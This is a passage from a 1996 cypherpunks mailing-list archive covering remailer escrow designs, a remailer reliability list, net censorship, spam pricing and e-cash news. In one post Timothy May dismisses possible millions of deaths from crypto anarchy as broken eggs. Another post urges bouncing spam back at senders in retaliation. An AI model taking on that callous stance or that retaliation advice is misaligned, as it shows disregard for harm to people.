this forum reaches some of the most > intelligent and well-informed minds on the net. Why, thank you! --- Dr.Dimitri Vulis KOTM Brighton Beach Boardwalk BBS, Forest Hills, N.Y.: +1-718-261-2013, 14.4Kbps From peter.allan at aeat.co.uk Mon Sep 9 09:49:54 1996 From: peter.allan at aeat.co.uk (Peter M Allan) Date: Tue, 10 Sep 1996 00:49:54 +0800 Subject: Job for netescrow ? (was Secure anonymouse server protocol... Message-ID: <9609091255.AA28353@clare.risley.aeat.co.uk> Adam and Matt put my casual remark under the grill: Peter Allan writes on cpunks: > [Matt Blaze's Oblivious Key Escrow paper] ftp://ftp.research.att.com/dist/mab/netescrow.ps > > This all hinges on a policy to be followed by archive holders defining > the conditions under which they release their shares. > This could be receipt of a signed request from the owner (remailer). > > Maybe the table relating nyms to reply addresses could be stored in > netescrow style so that captured remailers reveal nothing. The problem > of operator coercion is not addressed by this. Adam: > Just to clarify, if I understand correctly you are proposing a penet > style system with the database held in `netescrow'. Yes. What I had in mind resembled the split list scheme used at a church I used to go to. UK tax law has concessions for regular giving (Covenants, in the jargon) and the church needed to know that comittments were being met. At the same time it was preferred not to know who was giving what. This was done by having 2 lists eg Namelist: Mr J Smith = member 999 Cashlist: member 999 gives 1000 / month If member 999 didn't give as planned, cashlist-holder could say to namelist-holder "have a word with 999". These were held by 2 people, trusted not to collude. Also I suppose committee reshuffles shouldn't put one person straight into the other post. My idea was to replicate this split list so that addrlist: leukos.gleukos at c2.org = index97b6150200000564 nymlist: index97b6150200000564 = an0001002304000101 at this.remailer This would be altered for the remailer table as: addlist: leukos.gleukos at c2.org = index97b6150200000564 addlist: an0001002304000101 at this.remailer = index97b6150200400281 and these 2 mappings would be escrowed: index97b6150200000564 -> index97b6150200400281 index97b6150200400281 -> index97b6150200000564 (Or just escrow the _keys_ for the latter, as Matt first thought.) > However the aim is not to prevent others > censoring your publically available writings, but to allow a second > avenue of access only in the case of `mob cryptography'. The aim is to prevent a seized remailer having its data read. The "angry mob cryptanalysis" is a side issue. > If the police are unsucessful (seems likely) does this offer the > operator much solice in his jail time for contempt of court, to > know that he has a vote of confidence in the moral correctness of > his decision from a population of the net? > Does it offer him any legal benefit? Are the share holders guilty > of contempt also, does this lessen his guilt, and harshness of > prosecution? (Remember that the share holders' identity and > location are unknown to the operator... > I'm not sure how useful this part is, unless the possibility of > `mob cryptography' is the desired feature. I'd have thought an > individual remailer operator would be more likely to fold than a > group of anonymous crypto-anarchists. I did say this didn't address operator coercion. The widespread cross-jurisdiction aspects of netescrow will be important here. Capture of hardware without scope for operator coercion would be protected against - but is an easy problem anyway. > 2. You could add the twist of an alternative duress key, that would > stand a real chance of successfully nuking the database. More > satisfying. I was thinking of calling this the "shredder ticket" and giving it to the sender (who can then distribute it to all remaining remailers without needing to use the seized one). This would depend on him realising that the remailer was (about to be) seized, and would have to be done before the enemy rounded up the shares. [Incidentally I'm not that keen on regarding the police as the enemy. My mention of "angry mob cryptanalysis" in the event of a crime was to show that it was not the ideal vehicle for crime. But then maybe I'm a statist pig.] In any case it would be necessary to > 3. Negative comment on the system: TLAs have a vested interest in > themselves being most of the share holders. True of the ownership > of the current remailers also of course. > The widespread cross-jurisdiction aspects of netescrow will be important here. (Perhaps including compulsory cross-border secret reassembly. ) I was envisaging this being combined with Mixmaster. (I see from your Eternity post that you'd run a netescrow scheme that way.) This gives us "vertical integration" a sort of "of the remailers, by the remailers and for the remailers". Careful design of message formats could make it hard to tell the escrow mechanics from the traffic. To mount this collusion attack the TLAs would have to be part of the scheme - helping to pass most anonymous messages in order to trace some random ones, not necessarily those they want to trace. (If there was nothing in it for them they wouldn't join.) (Compare that to the current state quoted as near as I can remember from AC2 "It seems reasonable to assume that the NSA can break any message that it intercepts, but not all messages") It takes time to collect the shares and determine the next destination, during this time the message is sat in a pool. (Is there scope for traffic analysis in the fact that the average speed of messages will be lower than that of shares ?) With that in mind I was looking at the scope for cheating. Cheating seems possible by: 1) Collusion (as mentioned) 2) Not releasing (valid) shares when requested This can be caught by traps. The list of where the shares went is usually destroyed, but need not be. The shareholders are none the wiser, and when they get known for not releasing shares the remailer excludes them from future share issues. 3) Flooding attacks - storing rubbish in escrow servers who are eventually forced to accept no more shares, or ditch some existing ones. So far as I can see Matt's Netescrow scheme has exactly this problem. Ecash payments might help. If existing shares are ditched the reply-ability will not last long. You might get a message you can reply to for 2 weeks, but no later. Sender might resend periodically - a bit like following up an unanswered snail mail. > At the same time it would provide an argument against GAK, all > legitimate (in the publics eyes, what other opinions count, this is a > democracy isn't it) law enforcement needs met. As in the last sentence or so of the OKE paper. Matt: > My original idea for OKE was as a way to backup long-term, > slow-changing sensitive data without also introducing a single point > of failure for either security or availability. The remailer model is > a bit different, and I'm not sure it's a good fit, in particular > because I haven't thought about the various new failure modes in this > application. But let me think ``out loud.'' > > So can this scheme be improved upon? Is there a better way to run a > persistent-reply-address remailer? These are interesting, and I think > largely open, questions. -- Peter Allan peter.allan at aeat.co.uk From jbugden at smtplink.alis.ca Mon Sep 9 09:57:08 1996 From: jbugden at smtplink.alis.ca (jbugden at smtplink.alis.ca) Date: Tue, 10 Sep 1996 00:57:08 +0800 Subject: IDC_ard Message-ID: <9608098422.AA842287223@smtplink.alis.ca> jya at pipeline.com (John Young) forwarded: >9-8-96. NYP Mag: >"The True Terror Is In the Card." >Faced with rising crime, illegal immigration, welfare >fraud and absentee parents, many bureaucrats and members >of Congress insist that the nation would run more >smoothly if we all had counterfeit-proof plastic >identity cards. >http://jya.com/idcard.txt (11 kb) And to get all the Christian Right (no pun intended) up in arms, just suggest that the best way to prevent theft of these ID cards would be to place the information on a microchip and implant it in your body. Forehead and right wrist preferably. James From tank at xs4all.nl Mon Sep 9 10:15:18 1996 From: tank at xs4all.nl (SPG) Date: Tue, 10 Sep 1996 01:15:18 +0800 Subject: PRESS RELEASE: GERMANY CENSORS DUTCH WEBSITE WWW.XS4ALL.NL In-Reply-To: <2.2.32.19960908184651.00ac63d4@vertexgroup.com> Message-ID: <32343DEB.7EA7A383@xs4all.nl> Stephan Schmidt wrote: > > September 9th, > > I _can_ _access_ www.xs4all.nl _from_ _inside_ _Germany_. > > -stephan > > PS: using 3 different routes (accounts). Yes off course. Read this (from press-release xs4all.nl): Xs4all Internet will rotate the IP-numbering of the website www.xs4all.nl to ensure that it's 3100 userpages will all remain available for any internet-user. From raph at CS.Berkeley.EDU Mon Sep 9 10:38:12 1996 From: raph at CS.Berkeley.EDU (Raph Levien) Date: Tue, 10 Sep 1996 01:38:12 +0800 Subject: List of reliable remailers Message-ID: <199609091350.GAA19806@kiwi.cs.berkeley.edu> I operate a remailer pinging service which collects detailed information about remailer features and reliability. To use it, just finger remailer-list at kiwi.cs.berkeley.edu There is also a Web version of the same information, plus lots of interesting links to remailer-related resources, at: http://www.cs.berkeley.edu/~raph/remailer-list.html This information is used by premail, a remailer chaining and PGP encrypting client for outgoing mail. For more information, see: http://www.c2.org/~raph/premail.html For the PGP public keys of the remailers, finger pgpkeys at kiwi.cs.berkeley.edu This is the current info: REMAILER LIST This is an automatically generated listing of remailers. The first part of the listing shows the remailers along with configuration options and special features for each of the remailers. The second part shows the 12-day history, and average latency and uptime for each remailer. You can also get this list by fingering remailer-list at kiwi.cs.berkeley.edu. $remailer{"extropia"} = " cpunk pgp special"; $remailer{"c2"} = " eric pgp hash reord"; $remailer{"penet"} = " penet post"; $remailer{"flame"} = " cpunk mix pgp. hash latent cut post reord"; $remailer{"mix"} = " cpunk mix pgp hash latent cut ek ksub reord ?"; $remailer{"replay"} = " cpunk mix pgp hash latent cut post ek"; $remailer{"ecafe"} = " cpunk mix"; $remailer{"amnesia"} = " cpunk mix pgp hash latent cut ksub"; $remailer{'alpha'} = ' alpha pgp'; $remailer{'nymrod'} = ' alpha pgp'; $remailer{"lead"} = " cpunk pgp hash latent cut ek"; $remailer{"nemesis"} = " cpunk pgp hash latent cut"; $remailer{"exon"} = " cpunk pgp hash latent cut ek"; $remailer{"vegas"} = " cpunk pgp hash latent cut"; $remailer{"haystack"} = " cpunk mix pgp hash latent cut ek"; $remailer{"ncognito"} = " mix cpunk pgp hash latent"; $remailer{"lucifer"} = " cpunk mix pgp hash latent cut ek"; $remailer{"jam"} = " cpunk mix pgp hash latent cut ek"; $remailer{"winsock"} = " cpunk pgp hash cut ksub reord"; $remailer{'nym'} = ' newnym pgp'; $remailer{"balls"} = " cpunk pgp hash latent cut ek"; $remailer{"squirrel"} = " cpunk mix pgp hash latent cut ek"; $remailer{"middle"} = " cpunk mix pgp hash middle latent cut ek reord"; $remailer{'cyber'} = ' alpha pgp'; $remailer{"dustbin"} = " cpunk pgp hash ksub latent cut ek mix reord"; catalyst at netcom.com is _not_ a remailer. lmccarth at ducie.cs.umass.edu is _not_ a remailer. usura at replay.com is _not_ a remailer. Groups of remailers sharing a machine or operator: (cyber mix) The alpha and nymrod nymservers are down due to abuse. However, you can use the cyber nymserver. The nym.alias.net server will be listed soon. See http://www.cs.berkeley.edu/~raph/n.a.n.html for details. 403 Permission denied errors have been caused by a flaky disk on the Berkeley WWW server. Hopefully, this is fixed by now. The penet remailer is closed. Last update: Mon 9 Sep 96 6:45:23 PDT remailer email address history latency uptime ----------------------------------------------------------------------- jam remailer at cypherpunks.ca +**+******** 18:19 99.99% mix mixmaster at remail.obscura.com ++++++++++++ 1:04:20 99.98% exon remailer at remailer.nl.com +*******#**# 1:51 99.98% squirrel mix at squirrel.owl.de --.++++-+++ 1:54:34 99.97% replay remailer at replay.com +*** *+***** 5:02 99.83% amnesia amnesia at chardos.connix.com +---------- 3:22:14 99.78% balls remailer at huge.cajones.com +*********** 5:08 99.75% cyber alias at alias.cyberpass.net +*+*+*+* *** 27:34 99.47% lead mix at zifi.genetics.utah.edu ++++++++ -++ 1:00:20 99.36% dustbin dustman at athensnet.com -+* 2:46:09 98.70% middle middleman at jpunix.com --+++++ -- 1:08:18 98.27% haystack haystack at holy.cow.net +### #*#### 3:19 95.26% extropia remail at miron.vip.best.com ---------- 4:55:16 94.74% winsock winsock at c2.org -+-------- 3:14:43 91.19% nemesis remailer at meaning.com +******* 24:33 57.62% History key * # response in less than 5 minutes. * * response in less than 1 hour. * + response in less than 4 hours. * - response in less than 24 hours. * . response in more than 1 day. * _ response came back too late (more than 2 days). cpunk A major class of remailers. Supports Request-Remailing-To: field. eric A variant of the cpunk style. Uses Anon-Send-To: instead. penet The third class of remailers (at least for right now). Uses X-Anon-To: in the header. pgp Remailer supports encryption with PGP. A period after the keyword means that the short name, rather than the full email address, should be used as the encryption key ID. hash Supports ## pasting, so anything can be put into the headers of outgoing messages. ksub Remailer always kills subject header, even in non-pgp mode. nsub Remailer always preserves subject header, even in pgp mode. latent Supports Matt Ghio's Latent-Time: option. cut Supports Matt Ghio's Cutmarks: option. post Post to Usenet using Post-To: or Anon-Post-To: header. ek Encrypt responses in reply blocks using Encrypt-Key: header. special Accepts only pgp encrypted messages. mix Can accept messages in Mixmaster format. reord Attempts to foil traffic analysis by reordering messages. Note: I'm relying on the word of the remailer operator here, and haven't verified the reord info myself. mon Remailer has been known to monitor contents of private email. filter Remailer has been known to filter messages based on content. If not listed in conjunction with mon, then only messages destined for public forums are subject to filtering. Raph Levien From michael.tighe at Central.Sun.COM Mon Sep 9 11:10:11 1996 From: michael.tighe at Central.Sun.COM (Michael Tighe SUN IMP) Date: Tue, 10 Sep 1996 02:10:11 +0800 Subject: TWA 800 - Serious thread. In-Reply-To: <56mZTD63w165w@bwalk.dm.com> Message-ID: <199609091434.JAA09142@jeep.Central.Sun.COM> Dr.Dimitri Vulis KOTM writes: >I recall that the perp rented the vehicle and gave a $400 cash deposit. >He subsequently returned to the rental agency, stated that the vehicle >was stolen, and demanded his cash back. And the Oklahoma City perp was >caught speeding with no licence plates. >Shit. Whoever recruits those terrorists needs a better h.r. department to >screen for stupidity. :-) No, actually they are doing an outstanding job of finding a bunch of usefull idiots to do the dirty work for them. And of course, serving them up to law enforcement for punishment, while they remain behind the scenes. From tcmay at got.net Mon Sep 9 11:17:56 1996 From: tcmay at got.net (Timothy C. May) Date: Tue, 10 Sep 1996 02:17:56 +0800 Subject: China joins Singapore, Germany, .... Message-ID: CNN is presenting coverage of China's decision to pull the plug on more than 100 sites, and issuing a list of sites which are illegal to connect to. (Net censorship is getting to be a big story....when the list of countries reaches 15, it will of course no longer be news. And when the United States block access, this will all be transmogrified into an "Anti-Terrorist Action.") --Tim May We got computers, we're tapping phone lines, I know that that ain't allowed. ---------:---------:---------:---------:---------:---------:---------:---- Timothy C. May | Crypto Anarchy: encryption, digital money, tcmay at got.net 408-728-0152 | anonymous networks, digital pseudonyms, zero W.A.S.T.E.: Corralitos, CA | knowledge, reputations, information markets, Higher Power: 2^1,257,787-1 | black markets, collapse of governments. "National borders aren't even speed bumps on the information superhighway." From fletch at ain.bls.com Mon Sep 9 11:57:17 1996 From: fletch at ain.bls.com (Mike Fletcher) Date: Tue, 10 Sep 1996 02:57:17 +0800 Subject: Conservation Laws, Money, Engines, and Ontology (fwd) In-Reply-To: <9609061904.AA00879@ch1d157nwk> Message-ID: <9609091508.AA04357@outland> > Donald Eastlake writes: > > I don't think any one step will solve all our spam problems > > but I wouldn't mind spending, say, 5 cents for each real piece > > of mail I sent outside my company and if end machines charged > > 5 cents per piece of ouside mail received, I think spamming > > would be crippled. (Note that with bad guy lists, you could > > collect the money and then just throw away the mail.) > > So would you be willing to pay $50.00 for this message you sent to > cypherpunks? If there are a thousand recipients and each one charges $0.05 > for the priveledge of you sending it e-mail.... It seems like such a scheme > would not only cripple spam, but public discussion lists like this one. A better solution might be pay $whatever to be allowed to post to the list. Nothing is charged for receiving mail from the list, but you have to ante up to join in the discussion. If someone spams (spam being defined up front and communicated to all list members) then their posting priv's are revoked. Then you can charge for receipt of mail normally yet still have (relatively) open lists for discussion. --- Fletch __`'/| fletch at ain.bls.com "Lisa, in this house we obey the \ o.O' ______ 404 713-0414(w) Laws of Thermodynamics!" H. Simpson =(___)= -| Ack. | 404 315-7264(h) PGP Print: 8D8736A8FC59B2E6 8E675B341E378E43 U ------ From kamml at secret.org Mon Sep 9 12:18:23 1996 From: kamml at secret.org (kamml at secret.org) Date: Tue, 10 Sep 1996 03:18:23 +0800 Subject: What is the EFF doing exactly? In-Reply-To: Message-ID: >> >> Try & mail an anonymous FedEx package. > >Just lie on the sender label, isn't that obvious? I know people who >actually use "codeword" sender labels, in case FedEx or federales ask >about a package they can tell by the sender mentioned which to disavow :) > Obvious if you can pay anonymously. >> Try and pay cash in most Fedex offices. > >I always do and as long as I have exact change I have never been >hassled. > Fedex will not accept cash in New York City. I have tried to pay cash and been refused. I have talked to customer service and confirmed that they will not accept cash in NYC although they will elsewhere. From bgamble at wo0033wp.wo.blm.gov Mon Sep 9 12:27:59 1996 From: bgamble at wo0033wp.wo.blm.gov (Barbara Gamble) Date: Tue, 10 Sep 1996 03:27:59 +0800 Subject: Test...sorry about this - Reply Message-ID: I got it too. And since I am a new subscriber, I thought it might be the normal traffic. The Welcome msg *did* say the list is high-traffic. Still, I was aghast--300 all at once, another 100 just in the last hour. Is that typical? (Please forgive such a question from a newcomer to the list.) >>> Z.B. 09/06 10:38 am >>> I'm just posting this to see if there's something wrong with my mail filter - it dumped a ton of messages from this list over the night, and I'm trying to figure out why the !@%$# it did that. Sorry for the interruption. --- Zach Babayco zachb at netcom.com <----- finger for PGP public key http://www.geocities.com/SiliconValley/Park/4127 From tcmay at got.net Mon Sep 9 12:30:43 1996 From: tcmay at got.net (Timothy C. May) Date: Tue, 10 Sep 1996 03:30:43 +0800 Subject: Conservation Laws, Money, Engines, and Ontology Message-ID: At 4:03 AM 9/9/96, Greg Kucharo wrote: > One thing that occurs here. I imagine a scenario where you have a >"share" of resources on a system(and ISP for example). You're metered as >to how much you can post or store. Actually as it is now posting is >regulated through extra payments per meg above the limit. Spam is being >somewhat regulated by Terms of Service type things, but my point is what is >to prevent pooling resources among several system to achive the same Spam >pursuits some have. Say for example that an individual gets several >accounts to balance the load at thier point. The Usenet for example has no > "choke point". How could ISP's apply conservation here? If you limit the >amount of traffic you still aren't holding back the flow of "spam". > Here's where reputations could come in. You cound't open a new account >anywhere without a good "reputation". This could aid in balancing the load >of certain people. The most basic principle is this: those with resources they control (and "own") set the rates and policies. We don't have to figure out how the pricing will ripple down the line, or whether what some call "spam" will be controlled. (My view is that the whole focus on "spam" has been singularly unfruitful. We don't call magazine or television advertising "spam," though it meets operational definitions of spam, or velveeta, or whatever the latest terms is. While much advertising is disgusting, unwanted, noisome, etc., we understand that the publisher of a magazine can choose what to include and we can choose whether to buy it or not. (Television and radio are somewhat different, due to the FCC licensing and limited bandwidth, but the principle is the same.)) Thus, when carriers of packet traffic begin market pricing of packets, the pricing will ripple back. Eventually. (Or not, should some steps in the chain decide not to pass on costs...) I expect the failure of the Internet to have proper conservation laws to be solved in this way: Removal of Market Distortions + Auctioning Mechanisms + Several Large Network Crashes = A More Rational Market Model for Network Usage --Tim May We got computers, we're tapping phone lines, I know that that ain't allowed. ---------:---------:---------:---------:---------:---------:---------:---- Timothy C. May | Crypto Anarchy: encryption, digital money, tcmay at got.net 408-728-0152 | anonymous networks, digital pseudonyms, zero W.A.S.T.E.: Corralitos, CA | knowledge, reputations, information markets, Higher Power: 2^1,257,787-1 | black markets, collapse of governments. "National borders aren't even speed bumps on the information superhighway." From tcmay at got.net Mon Sep 9 12:38:53 1996 From: tcmay at got.net (Timothy C. May) Date: Tue, 10 Sep 1996 03:38:53 +0800 Subject: Conjuring up the latest utopia for a minoritarian sect of illuminati Message-ID: At 10:04 AM 9/9/96, Enzo Michelangeli wrote: >I and you may well choose to do so, but the vast majority of the human >beings believe just anything that is repeated loud and long enough. >Otherwise, nobody would hire PR and pay for advertisement, politicians >wouln't be fedwith taxpayer's money, Bosnians would trade goods instead >of gunshots, etc. I'm personally not interested in conjuring up the latest >utopia for a minoritarian sect of illuminati: I need to live in the real >world, and push for viable solutions that change it for better, now. Yes, Bosnians and Serbs would not be killing each other if only they could receive government-approved information! (Hint: This shows that neither governments nor churches nor the United Nations knows any better solutions to the "who do you trust" problem. And, I believe, mostly governments and other such entities exist to serve their own interests.) As to what I presume is an insult to the folks on this list ("I'm personally not interested in conjuring up the latest utopia for a minoritarian sect of illuminati"), you know where the exit is. --Tim May We got computers, we're tapping phone lines, I know that that ain't allowed. ---------:---------:---------:---------:---------:---------:---------:---- Timothy C. May | Crypto Anarchy: encryption, digital money, tcmay at got.net 408-728-0152 | anonymous networks, digital pseudonyms, zero W.A.S.T.E.: Corralitos, CA | knowledge, reputations, information markets, Higher Power: 2^1,257,787-1 | black markets, collapse of governments. "National borders aren't even speed bumps on the information superhighway." From tcmay at got.net Mon Sep 9 12:43:07 1996 From: tcmay at got.net (Timothy C. May) Date: Tue, 10 Sep 1996 03:43:07 +0800 Subject: Voluntary Disclosure of True Names Message-ID: At 11:18 AM 9/8/96, James A. Donald wrote: >At 10:49 AM 9/5/96 -0700, Vladimir Z. Nuri wrote: >> I have seen it repeated here often that somehow anonymity is some kind >> of a "right" that one should have in all kinds of different & important >> transactions, not merely on "cyberspace debate societies". I see >> here frequently the implication that *private*entities* that want to >> enforce identity in their own transactions are somehow implementing >> a corrupt, orwellian system. > >We hold that private entities have the right to attempt to impose corrupt >orwellian systems provided they do not do it at gunpoint, but we doubt >that they will succeed without guns. An overstatement which diminishes the power of your arguments. Namely, many, many corporations have Orwellian surveillance systems and policies which would be unacceptable if imposed by a government. No guns are involved, only the considerations of employment, paychecks, and the like. Likewise, many private schools have such systems. Likewise, no guns are involved. And so on. (Naturally, I am not criticizing these voluntarily-entered-into arrangements, merely rebutting the point that people will generally not put up with Orwellian schemes unless threatened with guns.) --Tim May We got computers, we're tapping phone lines, I know that that ain't allowed. ---------:---------:---------:---------:---------:---------:---------:---- Timothy C. May | Crypto Anarchy: encryption, digital money, tcmay at got.net 408-728-0152 | anonymous networks, digital pseudonyms, zero W.A.S.T.E.: Corralitos, CA | knowledge, reputations, information markets, Higher Power: 2^1,257,787-1 | black markets, collapse of governments. "National borders aren't even speed bumps on the information superhighway." From adam at homeport.org Mon Sep 9 12:45:46 1996 From: adam at homeport.org (Adam Shostack) Date: Tue, 10 Sep 1996 03:45:46 +0800 Subject: [WAS xs4all.nl] Terrorists In-Reply-To: Message-ID: <199609091635.LAA16589@homeport.org> Stephan Schmidt wrote: | One thought : How many of you would support terrorist | web server (say Oklahoma, TWA, Iran, Lybia, RAF, IRA, ...) ? I've given support to at least two terrorist organization, probably closer to five in the last year. I can't see supporting one more would do any more harm. Adam -- "It is seldom that liberty of any kind is lost all at once." -Hume From fletch at ain.bls.com Mon Sep 9 13:08:46 1996 From: fletch at ain.bls.com (Mike Fletcher) Date: Tue, 10 Sep 1996 04:08:46 +0800 Subject: Junk Phone Calls, Metered Usage, and Cellphones In-Reply-To: Message-ID: <9609091539.AA04462@outland> [ Telemarketer script removed, (spit :) ] > > As you yourself point out, their charging you for each incoming call during > business hours is unacceptable. Why don't they bill the 42c / minute to > whomever is calling YOU, as they do with LD and 900 numbers? This is why I really like the service that I have. I have a "personal number" that is my voice, fax, pager, and voice mail. If someone calls it, it asks them to wait while it locates me. It then has a list of numbers it calls to try and find me (desk at work, cell phone, home phone after 5pm or weekends). When I answer it tells me who's on the phone, and if I don't want to talk to them I just hit a key and throw them to the voice mail wolves. As for billing the caller, from what I hear at work I think it's because of problems with the way the cellular network does billing that (currently) make caller-pays cellular undoable. But that's a telephony problem and I'm just the resident UNIX weenie. :) --- Fletch __`'/| fletch at ain.bls.com "Lisa, in this house we obey the \ o.O' ______ 404 713-0414(w) Laws of Thermodynamics!" H. Simpson =(___)= -| Ack. | 404 315-7264(h) PGP Print: 8D8736A8FC59B2E6 8E675B341E378E43 U ------ From netsurf at pixi.com Mon Sep 9 13:11:06 1996 From: netsurf at pixi.com (NetSurfer) Date: Tue, 10 Sep 1996 04:11:06 +0800 Subject: Court challenge to AOL junk-mail blocks In-Reply-To: <960906233848_279253392@emout14.mail.aol.com> Message-ID: On Fri, 6 Sep 1996 AwakenToMe at aol.com wrote: > Tell me about it. Im on AOL. WHO CARESSSSSSS if ya get one MAYBE two pieces > of mail you take LESS than a second to delete them both with the handy > delete key. These people are wasting more time complaining about it than they > will ever do actually deleting it. If you know a valid email address on the spammers system you can always bounce each message back to them. If enough people turned the messages back on them it might give them the opportunity to experience first hand what its like to receive tons of mail you don't want or need... #include _ __ __ _____ ____ / | / /__ / /_/ ___/__ _______/ __/__ _____ / |/ / _ \/ __/\__ \/ / / / ___/ /_/ _ \/ ___/ / /| / __/ /_ ___/ / /_/ / / / __/ __/ / ================/_/=|_/\___/\__//____/\__,_/_/==/_/==\___/_/=============== From reagle at rpcp.mit.edu Mon Sep 9 13:16:18 1996 From: reagle at rpcp.mit.edu (Joseph M. Reagle Jr.) Date: Tue, 10 Sep 1996 04:16:18 +0800 Subject: E-Cash Poses Worldwide Banking Threat - Report 09/06/96 Message-ID: <2.2.32.19960909160217.00a04d9c@206.33.128.129> >PALO ALTO, CALIFORNIA, U.S.A., 1996 SEP 6 (NB) -- By Richard Bowers. >By the year 2000, consumers, businesses, governments, and >educational institutions worldwide will use electronic cash (e-cash) >for nine billion payment transactions. According to a new study by Killen >& Associates, this increase in e-cash will pose a great threat to some of >the biggest institutions in the world. > >The report specifically highlights the risk to the retail and banking >industries. Speaking to Newsbytes, a spokesperson for Killen said that >the report, which will be issued later this month, gives little solace to >the problems facing traditional retail companies. The report does >however, say that the banks can regain the leadership position in >payments by moving quickly to leverage their payment transaction >infrastructure to fully support e-cash. > >"By 2005, e-cash transactions will escalate to almost 30 billion," >stated Michael Killen, president of the market research firm. "Banks >must act quickly to leverage their position in payment services. Non- >banks see this as a new opportunity to carve further market share >away from the banking industry. All will compete for new revenue >streams including Internet-based micropayments." > >The report uses a very broad definition of e-cash including among >others; secured debit cards, phone cards, electronic checks, ATM >transactions, point of sale loans, and automated tolls. > >Using this broad definition they estimate that in 1995 there were 536 >billion non e-cash transactions worldwide compared to only 1 billion >e-cash transactions, or about .0019 percent. By the year 2005, of a >total estimated 1 trillion transactions, the report predicts 3 percent >or around 30 billion transactions will be e-cash. > >"The impact of e-cash will be widespread on both banking and >commerce," Killen added. "Opportunities will open for financial and >other product and services players, including ATM vendors such as >NCR, Diebold, and IBM; credit card authorization firms, including First >Data, Total Systems, Equifax, and National Data; ATM/POS terminal >manufacturers and network suppliers, including bank-owned >networks, American Express, Deluxe, ACS, and VeriFone; and cash >handling/cash management services firms such as ADP, GEIS, National >Data, and Brinks. Software firms that understand the enormous >system integration opportunities of adapting legacy systems to on- >line, secured environments will also benefit from the need to support >e-cash transactions." > >The report will include forecasts of the overall payments environment >and the impact of e-cash on cash, checks, credit cards, and other >electronic payment systems though the year 2005. It will also have a >section on the opportunities for new business, dislocations, and >threats to existing businesses, with emphasis on acquisition and >alliance opportunities. > >"E-cash provides the necessary payment options to support new and >low-cost products and services, including micropublishing," Killen >continued. "Information services such as AC Nielsen, Dun & Bradstreet, >and Wall Street investment and advisory firms will fill their clients' >needs for customized news. This will lead to a new understanding of >personal and commercial buying patterns, wants, and needs. >Individual consumer purchase, transaction, and life-style profiles will >be developed. Advertisers can then use this information to target >market-customized advertising and marketing programs." > >(19960906/Press Contact: Jules Street, Killen & Associates, 415-617- >6130) > > > _______________________ Regards, Nothing is so strong as gentleness, and nothing is so gentle as true strength. -Ralph Sockman Joseph Reagle http://rpcp.mit.edu/~reagle/home.html reagle at mit.edu E0 D5 B2 05 B6 12 DA 65 BE 4D E3 C1 6A 66 25 4E From reagle at rpcp.mit.edu Mon Sep 9 13:17:10 1996 From: reagle at rpcp.mit.edu (Joseph M. Reagle Jr.) Date: Tue, 10 Sep 1996 04:17:10 +0800 Subject: IBM to unveil Internet banking alliance Message-ID: <2.2.32.19960909160218.00a490a4@206.33.128.129> >Date: Mon, 9 Sep 1996 11:20:03 -0400 >From: reagle at rpcp.mit.edu (Joseph M. Reagle Jr.) >To: reagle at rpcp.mit.edu >Subject: IBM to unveil Internet banking alliance > > > > SAN FRANCISCO (Reuter) - International Business Machines >Corp. has made an alliance with more than a dozen >major banks to provide consumer banking services using >Internet technology, IBM and industry executives said Friday. > The consortium will be dubbed Integrity and will be owned >equally by IBM and each of the partners. > Banks will be able to use IBM's worldwide private network >as well as the Internet to enable their customers to do their >banking electronically. Specific details of the banking >arrangement have yet to be worked out, one of the executives >said. > IBM and the banking instititutions involved are due to >unveil the Integrity project in New York on Monday. > The alliance is one of several industry projects that >IBM's Internet Division is establishing to help large >companies utilize the Internet. > The banking alliance will have competition from other >electronic banking services being organised by companies like >Intuit Corp., America Online Inc. and Microsoft Corp. > Just this week, Intuit and America Online said a number of >leading financial institutions would offer their customers >online banking via AOL, using software developed by Intuit >known as BankNOW. > At an Internet and Electronic Commerce conference in San >Francisco this week, Intuit Chairman Scott Cook said the new >service targets people who want to use electronic transactions >to speed up their banking. > Cook said he expects the new service will differ from what >the IBM-led consortium might provide. > NationsBank has been among companies frequently mentioned >as participating in the IBM consortium, but a spokesman late >on Friday declined to discuss a Wall Street Journal report >that it would be involved in the consortium. > > > _______________________ Regards, Nothing is so strong as gentleness, and nothing is so gentle as true strength. -Ralph Sockman Joseph Reagle http://rpcp.mit.edu/~reagle/home.html reagle at mit.edu E0 D5 B2 05 B6 12 DA 65 BE 4D E3 C1 6A 66 25 4E From tcmay at got.net Mon Sep 9 13:32:47 1996 From: tcmay at got.net (Timothy C. May) Date: Tue, 10 Sep 1996 04:32:47 +0800 Subject: [WAS xs4all.nl] Terrorists Message-ID: At 11:50 AM 9/9/96, Jon Lebkowsky wrote: >At 11:01 AM 9/9/96 +0200, Stephan Schmidt wrote: > >>One thought : How many of you would support terrorist >>web server (say Oklahoma, TWA, Iran, Lybia, RAF, IRA, ...) ? > >I.e. "How many of you support the right to free speech regardless of content." > >Wellll...there is the rule about speech which endangers; "fire in a crowded >theatre" is the cliche-example. What could a terrorist SAY that would >endanger? Personally, I'd rather have terrorists building html than bombs. As Dettweiler is usually so fond of pointing out, it would be disingenuous of us not to acknowledge that the systems we are talking about (fully untraceable, strong anonymity, digital pseudonyms, digital cash, information markets, i.e., "crypto anarchy") will in fact be used for all sorts of things. Including folks who want to blow up Parliament, the Congress, the People's Tribunal, etc. And by folks who wish to trade in CBW secrets, who wish to arrange contract killings, and so on. This has been well-known for many years. My paper on "Crypto Anarchy and Virtual Communities" was villified by no less than Dorothy Denning for describing how these things may evolve. I don't worry overmuch about a few thousand or even a few million people dying as a result of something we have had an influence on developing, anymore than the developers of many technologies need to worry about how others use their technologies. And the net effect of crypto anarchy is to destabilize and marginalize central governments, which is a net positive effect. If some eggs get broken in the process, the biological imperative will generate more eggs. No big deal. --Tim May We got computers, we're tapping phone lines, I know that that ain't allowed. ---------:---------:---------:---------:---------:---------:---------:---- Timothy C. May | Crypto Anarchy: encryption, digital money, tcmay at got.net 408-728-0152 | anonymous networks, digital pseudonyms, zero W.A.S.T.E.: Corralitos, CA | knowledge, reputations, information markets, Higher Power: 2^1,257,787-1 | black markets, collapse of governments. "National borders aren't even speed bumps on the information superhighway." From jfricker at vertexgroup.com Mon Sep 9 13:40:57 1996 From: jfricker at vertexgroup.com (John F. Fricker) Date: Tue, 10 Sep 1996 04:40:57 +0800 Subject: [WAS xs4all.nl] Terrorists Message-ID: <2.2.32.19960909163116.00f89c8c@vertexgroup.com> At 08:32 AM 9/9/96 EDT, you wrote: >Stephan Schmidt writes: > >> One thought : How many of you would support terrorist >> web server (say Oklahoma, TWA, Iran, Lybia, RAF, IRA, ...) ? > >http://www.terrorist.org ? > Damn! In my backyard no less! whois terrorist.org Terrorist Organization 